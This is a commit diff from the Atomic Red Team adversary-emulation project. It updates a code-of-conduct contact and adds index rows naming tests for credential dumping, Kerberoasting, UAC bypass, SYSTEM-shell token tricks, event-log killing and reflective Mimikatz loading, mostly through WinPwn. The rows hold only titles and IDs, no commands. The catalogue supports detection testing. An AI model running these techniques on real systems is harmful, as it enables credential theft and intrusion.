sample PR test

* Create T1560.003 test 1

* Add T1048.003 Test 6

* Delete T1560.003 (moved to T1048.003

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

CODE_OF_CONDUCT.md

@@ -23,7 +23,7 @@ Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Ou
 
 ## Reporting
 
-If you see anything that you believe breaks our community guidelines, no matter if it’s privately or publicly witnessed, please reach out to the **Director of Open Source Programs – Adam Mashinchi** via Slack direct message or [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
+If you see anything that you believe breaks our community guidelines, no matter if it’s privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
 
 ## Enforcement & Consequences
 

atomics/Indexes/Indexes-CSV/index.csv

@@ -5,6 +5,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,p
 credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
+credential-access,T1558.004,AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
@@ -17,11 +18,20 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
+credential-access,T1552.001,Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
+credential-access,T1552.001,Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
+credential-access,T1552.001,Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
+credential-access,T1552.001,Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
+credential-access,T1552.001,Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
+credential-access,T1552.001,Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
 credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
 credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
 credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
+credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
+credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
+credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -30,11 +40,18 @@ credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to
 credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
 credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
 credential-access,T1555.003,Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
+credential-access,T1555.003,Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
+credential-access,T1555.003,Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
+credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
+credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
+credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
+credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
+credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
@@ -46,6 +63,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
 credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
 credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
+credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
+credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -79,6 +98,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
+credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -93,6 +114,7 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
+credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
 credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
@@ -112,10 +134,12 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1555.004,Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
+credential-access,T1555.004,Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
@@ -190,6 +214,10 @@ privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Metho
 privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -200,6 +228,7 @@ privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Exe
 privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
+privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
@@ -211,6 +240,7 @@ privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azu
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+privilege-escalation,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
@@ -221,6 +251,8 @@ privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-
 privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+privilege-escalation,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -315,6 +347,10 @@ defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,
 defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
+defense-evasion,T1548.002,Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
+defense-evasion,T1548.002,Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
+defense-evasion,T1548.002,Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -352,6 +388,7 @@ defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and
 defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
+defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -416,10 +453,12 @@ defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender wi
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055.001,Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -481,6 +520,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+defense-evasion,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
 defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
@@ -584,6 +625,7 @@ defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-8
 defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
 defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
+defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
 defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
@@ -636,6 +678,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -662,6 +706,8 @@ defense-evasion,T1070.006,Timestomp,7,Windows - Modify file last access timestam
 defense-evasion,T1070.006,Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
+defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
+defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -740,6 +786,8 @@ persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID
 persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+persistence,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -857,6 +905,7 @@ discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed
 discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1087.002,Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
 discovery,T1087.002,Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
+discovery,T1087.002,Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
